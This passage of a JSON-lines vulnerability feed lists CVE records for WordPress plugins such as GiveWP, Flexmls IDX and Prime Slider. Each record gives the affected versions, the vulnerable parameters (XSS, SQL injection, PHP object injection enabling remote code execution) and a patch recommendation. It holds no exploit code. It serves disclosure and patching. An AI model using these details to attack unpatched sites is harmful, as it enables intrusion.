version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a13ce09-b312-4186-b0e2-63065c47f15d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a13ce09-b312-4186-b0e2-63065c47f15d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.15.1\\\/vendor\\\/vendor-prefixed\\\/symfony\\\/http-foundation\\\/Tests\\\/Fixtures\\\/response-functional\\\/common.inc#L23\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.15.1\\\/vendor\\\/vendor-prefixed\\\/symfony\\\/http-foundation\\\/Tests\\\/Fixtures\\\/response-functional\\\/common.inc#L23\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3519","slug":"media-library-assistant","versionImpact":"3.15","versionEndExcluding":"3.16","description":"The Media Library Assistant plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the lang parameter in all versions up to, and including, 3.15 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e1cdaf3-76fe-4b73-b30b-4554f0d34d11?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e1cdaf3-76fe-4b73-b30b-4554f0d34d11?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3069819%40media-library-assistant%2Ftrunk&old=3060779%40media-library-assistant%2Ftrunk&sfp_email=&sfph_mail=#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3069819%40media-library-assistant%2Ftrunk&old=3060779%40media-library-assistant%2Ftrunk&sfp_email=&sfph_mail=#file3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3518","slug":"media-library-assistant","versionImpact":"3.15","versionEndExcluding":"3.16","description":"The Media Library Assistant plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode(s) in all versions up to, and including, 3.15 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor access or higher, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7af1a03-8382-4593-a41f-8cdb1bb9e53b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7af1a03-8382-4593-a41f-8cdb1bb9e53b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/includes\\\/class-mla-shortcode-custom-list.php#L1971\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/includes\\\/class-mla-shortcode-custom-list.php#L1971\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3069819%40media-library-assistant%2Ftrunk&old=3060779%40media-library-assistant%2Ftrunk&sfp_email=&sfph_mail=#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3069819%40media-library-assistant%2Ftrunk&old=3060779%40media-library-assistant%2Ftrunk&sfp_email=&sfph_mail=#file3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12852","slug":"happy-elementor-addons","versionImpact":"3.15.1","versionEndExcluding":"3.15.2","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ha_cmc_text' parameter of the Happy Mouse Cursor in all versions up to, and including, 3.15.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.15.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212495\\\/happy-elementor-addons\\\/tags\\\/3.15.2\\\/assets\\\/js\\\/custom-mouse-cursor.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212495\\\/happy-elementor-addons\\\/tags\\\/3.15.2\\\/assets\\\/js\\\/custom-mouse-cursor.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e60d4528-2ec5-4a4b-be77-0fc012c13720?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e60d4528-2ec5-4a4b-be77-0fc012c13720?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8896","slug":"profile-builder","versionImpact":"3.14.3","versionEndExcluding":"3.14.4","description":"The User Profile Builder \u2013 Beautiful User Registration Forms, User Profiles & User Role Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'gdpr_communication_preferences[]' parameter in all versions up to, and including, 3.14.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This is only exploitable when the GDPR Communication Preferences module is enabled and at least one GDPR Communication Preferences field has been added to the edit profile form.","recommendation":"Update to version 3.14.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3344317%40profile-builder&new=3344317%40profile-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3344317%40profile-builder&new=3344317%40profile-builder&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d28e118-07d3-483e-87b8-66ccdb79e879?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d28e118-07d3-483e-87b8-66ccdb79e879?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4339","slug":"bdthemes-prime-slider-lite","versionImpact":"3.14.3","versionEndExcluding":"3.14.4","description":"The Prime Slider \u2013 Addons For Elementor (Revolution of a slider, Hero Slider, Ecommerce Slider) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the General widget in all versions up to, and including, 3.14.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.14.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6eba6056-e087-4347-ad36-96501ceb4cdd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6eba6056-e087-4347-ad36-96501ceb4cdd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3080132%40bdthemes-prime-slider-lite%2Ftrunk&old=3079066%40bdthemes-prime-slider-lite%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3080132%40bdthemes-prime-slider-lite%2Ftrunk&old=3079066%40bdthemes-prime-slider-lite%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0863","slug":"flexmls-idx","versionImpact":"3.14.28","versionEndExcluding":"3.14.29","description":"The Flexmls\u00ae IDX Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'idx_frame' shortcode in all versions up to, and including, 3.14.27 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.14.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flexmls-idx\\\/tags\\\/3.14.25\\\/flexmls_connect.php#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flexmls-idx\\\/tags\\\/3.14.25\\\/flexmls_connect.php#L92\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flexmls-idx\\\/tags\\\/3.14.25\\\/lib\\\/base.php#L220\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flexmls-idx\\\/tags\\\/3.14.25\\\/lib\\\/base.php#L220\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3251292%40flexmls-idx&new=3251292%40flexmls-idx&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3251292%40flexmls-idx&new=3251292%40flexmls-idx&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c8e814b-3828-4b3f-a9ad-b3758ab9b109?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c8e814b-3828-4b3f-a9ad-b3758ab9b109?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10552","slug":"flexmls-idx","versionImpact":"3.14.26","versionEndExcluding":"3.14.27","description":"The Flexmls\u00ae IDX Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018api_key\u2019 and 'api_secret' parameters in all versions up to, and including, 3.14.26 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability was partially patched in version 3.14.25.","recommendation":"Update to version 3.14.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flexmls-idx\\\/trunk\\\/views\\\/admin-intro-api.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flexmls-idx\\\/trunk\\\/views\\\/admin-intro-api.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flexmls-idx\\\/trunk\\\/views\\\/admin-intro-api.php#L30\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flexmls-idx\\\/trunk\\\/views\\\/admin-intro-api.php#L30\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226484\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226484\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0624108b-cd60-4278-802d-d4853f73ec6a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0624108b-cd60-4278-802d-d4853f73ec6a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8719","slug":"flexmls-idx","versionImpact":"3.14.22","versionEndExcluding":"3.14.23","description":"The Flexmls\u00ae IDX Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via several parameters like 'MaxBeds' and 'MinBeds' in all versions up to, and including, 3.14.22 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.14.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aac3fb8e-9b92-4ed1-ac9f-50870d4c5c9f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aac3fb8e-9b92-4ed1-ac9f-50870d4c5c9f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3169439%40flexmls-idx&new=3169439%40flexmls-idx&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3169439%40flexmls-idx&new=3169439%40flexmls-idx&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3997","slug":"bdthemes-prime-slider-lite","versionImpact":"3.14.1","versionEndExcluding":"3.14.2","description":"The Prime Slider \u2013 Addons For Elementor (Revolution of a slider, Hero Slider, Ecommerce Slider) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Pagepiling widget in all versions up to, and including, 3.14.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.14.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8736fb91-d05c-4f7e-81ff-00dfa44961f5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8736fb91-d05c-4f7e-81ff-00dfa44961f5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074395\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3074395\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5941","slug":"give","versionImpact":"3.14.1","versionEndExcluding":"3.14.2","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to unauthorized access and deletion of data due to a missing capability check on the 'handle_request' function in all versions up to, and including, 3.14.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read attachment paths and delete attachment files.","recommendation":"Update to version 3.14.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/824ec2ba-b701-46e9-b237-53cd7d0e46da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/824ec2ba-b701-46e9-b237-53cd7d0e46da?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/src\\\/DonorDashboards\\\/Tabs\\\/EditProfileTab\\\/AvatarRoute.php#L36\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/src\\\/DonorDashboards\\\/Tabs\\\/EditProfileTab\\\/AvatarRoute.php#L36\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3132247\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3132247\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5932","slug":"give","versionImpact":"3.14.1","versionEndExcluding":"3.14.2","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files.","recommendation":"Update to version 3.14.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93e2d007-8157-42c5-92ad-704dc80749a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93e2d007-8157-42c5-92ad-704dc80749a3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/includes\\\/login-register.php#L235\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/includes\\\/login-register.php#L235\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/includes\\\/process-donation.php#L420\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/includes\\\/process-donation.php#L420\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/vendor\\\/vendor-prefixed\\\/fakerphp\\\/faker\\\/src\\\/Faker\\\/ValidGenerator.php#L80\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/vendor\\\/vendor-prefixed\\\/fakerphp\\\/faker\\\/src\\\/Faker\\\/ValidGenerator.php#L80\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/vendor\\\/tecnickcom\\\/tcpdf\\\/tcpdf.php#L7861\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/vendor\\\/tecnickcom\\\/tcpdf\\\/tcpdf.php#L7861\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/src\\\/DonorDashboards\\\/Tabs\\\/EditProfileTab\\\/AvatarRoute.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/src\\\/DonorDashboards\\\/Tabs\\\/EditProfileTab\\\/AvatarRoute.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3132247\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3132247\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2024\\\/08\\\/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin\\\/\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2024\\\/08\\\/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5977","slug":"give","versionImpact":"3.13.0","versionEndExcluding":"3.14.0","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.13.0 via the 'handleRequest' function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with GiveWP Worker-level access and above, to delete and update arbitrary posts.","recommendation":"Update to version 3.14.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2dca6c29-9f05-4d82-90e3-834f1dd8005a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2dca6c29-9f05-4d82-90e3-834f1dd8005a?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/src\\\/DonationForms\\\/V2\\\/Endpoints\\\/FormActions.php#L96\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/src\\\/DonationForms\\\/V2\\\/Endpoints\\\/FormActions.php#L96\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3120745\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3120745\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]}]"}
{"CVE_ID":"CVE-2024-5940","slug":"give","versionImpact":"3.13.0","versionEndExcluding":"3.14.0","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'handle_request' function in all versions up to, and including, 3.13.0. This makes it possible for unauthenticated attackers to edit event ticket settings if the Events beta feature is enabled.","recommendation":"Update to version 3.14.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3cda8d0-321c-4b15-980e-5ebf49fac367?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3cda8d0-321c-4b15-980e-5ebf49fac367?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/src\\\/EventTickets\\\/Routes\\\/UpdateEvent.php#L81\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/src\\\/EventTickets\\\/Routes\\\/UpdateEvent.php#L81\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/src\\\/EventTickets\\\/Routes\\\/UpdateEventTicketType.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/src\\\/EventTickets\\\/Routes\\\/UpdateEventTicketType.php#L78\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3120745\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3120745\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5939","slug":"give","versionImpact":"3.13.0","versionEndExcluding":"3.14.0","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'setup_wizard' function in all versions up to, and including, 3.13.0. This makes it possible for unauthenticated attackers to read the setup wizard administrative pages.","recommendation":"Update to version 3.14.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a104f88b-deae-465d-b4c1-9a1fc78e5ee9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a104f88b-deae-465d-b4c1-9a1fc78e5ee9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/src\\\/Onboarding\\\/Wizard\\\/Page.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.12.0\\\/src\\\/Onboarding\\\/Wizard\\\/Page.php#L78\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3120745\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3120745\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2314","slug":"profile-builder","versionImpact":"3.13.6","versionEndExcluding":"3.13.7","description":"The User Profile Builder \u2013 Beautiful User Registration Forms, User Profiles & User Role Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 3.13.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\r\nThe issue was partially patched in version 3.13.6 of the plugin, and fully patched in 3.13.7.","recommendation":"Update to version 3.13.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profile-builder\\\/tags\\\/3.13.4\\\/front-end\\\/logout.php#L9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profile-builder\\\/tags\\\/3.13.4\\\/front-end\\\/logout.php#L9\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268402\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268402\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ccf2b56-0355-43e6-a616-d06196e90972?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ccf2b56-0355-43e6-a616-d06196e90972?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8760","slug":"stackable-ultimate-gutenberg-blocks","versionImpact":"3.13.6","versionEndExcluding":"3.13.7","description":"The Stackable \u2013 Page Builder Gutenberg Blocks plugin for WordPress is vulnerable to CSS Injection in all versions up to, and including, 3.13.6. This makes it possible for unauthenticated attackers to embed untrusted style information into comments resulting in a possibility of data exfiltration such as admin nonces with limited impact. These nonces could be used to perform CSRF attacks within a limited time window. The presence of other plugins may make additional nonces available, which may pose a risk in plugins that don't perform capability checks to protect AJAX actions or other actions reachable by lower-privileged users.","recommendation":"Update to version 3.13.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1fd0b13c-7447-45da-9608-80b7629d9bbf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1fd0b13c-7447-45da-9608-80b7629d9bbf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3158674%40stackable-ultimate-gutenberg-blocks%2Ftrunk&old=3156448%40stackable-ultimate-gutenberg-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3158674%40stackable-ultimate-gutenberg-blocks%2Ftrunk&old=3156448%40stackable-ultimate-gutenberg-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1507","slug":"bdthemes-prime-slider-lite","versionImpact":"3.13.3","versionEndExcluding":"3.13.4","description":"The Prime Slider \u2013 Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title_tags' attribute of the Rubix widget in all versions up to, and including, 3.13.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.13.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09f2cb22-07e2-4fe5-8c2a-9d4420ee26ed?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09f2cb22-07e2-4fe5-8c2a-9d4420ee26ed?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3047591\\\/bdthemes-prime-slider-lite\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3047591\\\/bdthemes-prime-slider-lite\",\"refsource\":\"\",\"tags\":[]}]"}
